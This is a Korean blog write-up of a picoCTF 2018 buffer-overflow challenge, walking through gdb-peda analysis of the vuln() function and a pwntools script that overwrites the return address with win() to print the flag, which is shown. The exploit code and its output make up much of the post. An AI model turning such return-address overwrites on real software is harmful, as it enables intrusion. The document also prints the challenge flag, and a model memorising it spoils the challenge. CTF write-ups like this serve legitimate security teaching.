티스토리 뷰
단순한 BOF 문제이다.
바이너리를 살펴보면 win() 함수가 flag를 출력해주지만, win() 함수를 호출하지는 않는다
따라서, BOF를 통해 RET를 win() 함수로 변경하면 된다.
Analysis
- “info functions” 명령어로 win() 함수를 찾을수 있다.
gdb-peda$ info functions
All defined functions:
Non-debugging symbols:
0x080483ec _init
0x08048420 printf@plt
0x08048430 gets@plt
0x08048440 fgets@plt
0x08048450 getegid@plt
0x08048460 puts@plt
0x08048470 exit@plt
0x08048480 __libc_start_main@plt
0x08048490 setvbuf@plt
0x080484a0 fopen@plt
0x080484b0 setresgid@plt
0x080484c0 __gmon_start__@plt
0x080484d0 _start
0x08048500 __x86.get_pc_thunk.bx
0x08048510 deregister_tm_clones
0x08048540 register_tm_clones
0x08048580 __do_global_dtors_aux
0x080485a0 frame_dummy
0x080485cb win
0x0804862f vuln
0x0804865d main
0x080486c0 get_return_address
0x080486d0 __libc_csu_init
0x08048730 __libc_csu_fini
0x08048734 _fini
- win() 함수의 주소를 알아내자.
gdb-peda$ p win
$1 = {} 0x80485cb
- breakpoint를 걸고 Buffer와 RET 사이의 거리를 구해보자.
gdb-peda$ pd vuln
Dump of assembler code for function vuln:
0x0804862f <+0>: push ebp
0x08048630 <+1>: mov ebp,esp
0x08048632 <+3>: sub esp,0x28
0x08048635 <+6>: sub esp,0xc
0x08048638 <+9>: lea eax,[ebp-0x28]
0x0804863b <+12>: push eax
0x0804863c <+13>: call 0x8048430 <gets@plt>
0x08048641 <+18>: add esp,0x10
0x08048644 <+21>: call 0x80486c0
0x08048649 <+26>: sub esp,0x8
0x0804864c <+29>: push eax
0x0804864d <+30>: push 0x80487d4
0x08048652 <+35>: call 0x8048420 <printf@plt>
0x08048657 <+40>: add esp,0x10
0x0804865a <+43>: nop
0x0804865b <+44>: leave
0x0804865c <+45>: ret
End of assembler dump.
gdb-peda$ b * 0x08048641
Breakpoint 1 at 0x8048641
gdb-peda$ r
Starting program: /root/vuln
Please enter your string:
AAAA
[----------------------------------registers-----------------------------------]
EAX: 0xffffd700 ("AAAA")
EBX: 0x0
ECX: 0xf7fc65c0 --> 0xfbad2288
EDX: 0xf7fc789c --> 0x0
ESI: 0xf7fc6000 --> 0x1d7d6c
EDI: 0x0
EBP: 0xffffd728 --> 0xffffd748 --> 0x0
ESP: 0xffffd6f0 --> 0xffffd700 ("AAAA")
EIP: 0x8048641 (<vuln+18>: add esp,0x10)
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x8048638 <vuln+9>: lea eax,[ebp-0x28]
0x804863b <vuln+12>: push eax
0x804863c <vuln+13>: call 0x8048430 <gets@plt>
=> 0x8048641 <vuln+18>: add esp,0x10
0x8048644 <vuln+21>: call 0x80486c0
0x8048649 <vuln+26>: sub esp,0x8
0x804864c <vuln+29>: push eax
0x804864d <vuln+30>: push 0x80487d4
[------------------------------------stack-------------------------------------]
0000| 0xffffd6f0 --> 0xffffd700 ("AAAA")
0004| 0xffffd6f4 --> 0x0
0008| 0xffffd6f8 --> 0xf7fc6d80 --> 0xfbad2887
0012| 0xffffd6fc --> 0xfbad2887
0016| 0xffffd700 ("AAAA")
0020| 0xffffd704 --> 0xf7feae00 (call 0xf7fd6a80 <_dl_signal_error@plt>)
0024| 0xffffd708 --> 0xf7e55b4b (<puts+11>: add edi,0x1704b5)
0028| 0xffffd70c --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Breakpoint 1, 0x08048641 in vuln ()
- 0xfffd700 ~ 0xffffd728까지 Buffer가 할당된다.
gdb-peda$ x/100wx $esp
0xffffd6f0: 0xffffd700 0x00000000 0xf7fc6d80 0xfbad2887
0xffffd700: 0x41414141 0xf7feae00 0xf7e55b4b 0x00000000
0xffffd710: 0xf7fc6000 0x00000000 0xffffd748 0x080486ab
0xffffd720: 0x08048810 0x00000000 0xffffd748 0x080486b3
0xffffd730: 0x00000001 0xffffd7f4 0xffffd7fc 0x00000000
0xffffd740: 0xf7fe59b0 0xffffd760 0x00000000 0xf7e06e81
0xffffd750: 0xf7fc6000 0xf7fc6000 0x00000000 0xf7e06e81
0xffffd760: 0x00000001 0xffffd7f4 0xffffd7fc 0xffffd784
0xffffd770: 0x00000001 0x00000000 0xf7fc6000 0xf7fe575a
0xffffd780: 0xf7ffd000 0x00000000 0xf7fc6000 0x00000000
0xffffd790: 0x00000000 0x2b31cc7a 0x14438a6a 0x00000000
0xffffd7a0: 0x00000000 0x00000000 0x00000001 0x080484d0
0xffffd7b0: 0x00000000 0xf7feae20 0xf7fe59b0 0xf7ffd000
0xffffd7c0: 0x00000001 0x080484d0 0x00000000 0x080484f1
0xffffd7d0: 0x0804865d 0x00000001 0xffffd7f4 0x080486d0
0xffffd7e0: 0x08048730 0xf7fe59b0 0xffffd7ec 0xf7ffd940
0xffffd7f0: 0x00000001 0xffffd8fc 0x00000000 0xffffd907
0xffffd800: 0xffffd927 0xffffd93d 0xffffd945 0xffffd950
0xffffd810: 0xffffd965 0xffffd974 0xffffd97f 0xffffd98a
0xffffd820: 0xffffd9cc 0xffffdfb8 0xffffdfda 0xffffdfe4
0xffffd830: 0x00000000 0x00000020 0xf7fd5b40 0x00000021
0xffffd840: 0xf7fd5000 0x00000010 0x9f8bfbff 0x00000006
0xffffd850: 0x00001000 0x00000011 0x00000064 0x00000003
0xffffd860: 0x08048034 0x00000004 0x00000020 0x00000005
0xffffd870: 0x00000009 0x00000007 0xf7fd6000 0x00000008
Exploit
from pwn import *
context.log_level = "DEBUG"
p = process('./vuln')
win = 0x80485cb
payload = "\x90" * 44
payload += p32(win)
p.recvuntil('Please enter your string:')
p.send(payload)
p.interactive()
- 실행하면 아래와 같이 FLAG를 출력해준다.
root@d2a0b1af867f:~# python exploit.py
[+] Starting local process './vuln': pid 1308
[DEBUG] Received 0x1b bytes:
'Please enter your string: \n'
[DEBUG] Sent 0x30 bytes:
00000000 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 │····│····│····│····│
*
00000020 90 90 90 90 90 90 90 90 90 90 90 90 cb 85 04 08 │····│····│····│····│
00000030
[*] Switching to interactive mode
$
[DEBUG] Sent 0x1 bytes:
'\n' * 0x1
[DEBUG] Received 0x64 bytes:
'Okay, time to return... Fingers Crossed... Jumping to 0x80485cb\n'
'picoCTF{addr3ss3s_ar3_3asy56a7b196}\n'
Okay, time to return... Fingers Crossed... Jumping to 0x80485cb
picoCTF{addr3ss3s_ar3_3asy56a7b196}
[*] Got EOF while reading in interactive
$
[DEBUG] Sent 0x1 bytes:
'\n' * 0x1
[*] Process './vuln' stopped with exit code -11 (SIGSEGV) (pid 1308)
[*] Got EOF while sending in interactive
'Write-up' 카테고리의 다른 글
| [DEFCON 27] speedrun-001 (0) | 2019.08.01 |
|---|---|
| [picoCTF_2018] got-shell? (0) | 2019.06.19 |
| DEFCON 27 Quals Write-UP (0) | 2019.05.15 |
| Hackingcamp CTF 19th (0) | 2019.02.19 |
| TRUST CTF (0) | 2019.02.17 |
댓글
최근에 올라온 글
- Total
- Today
- Yesterday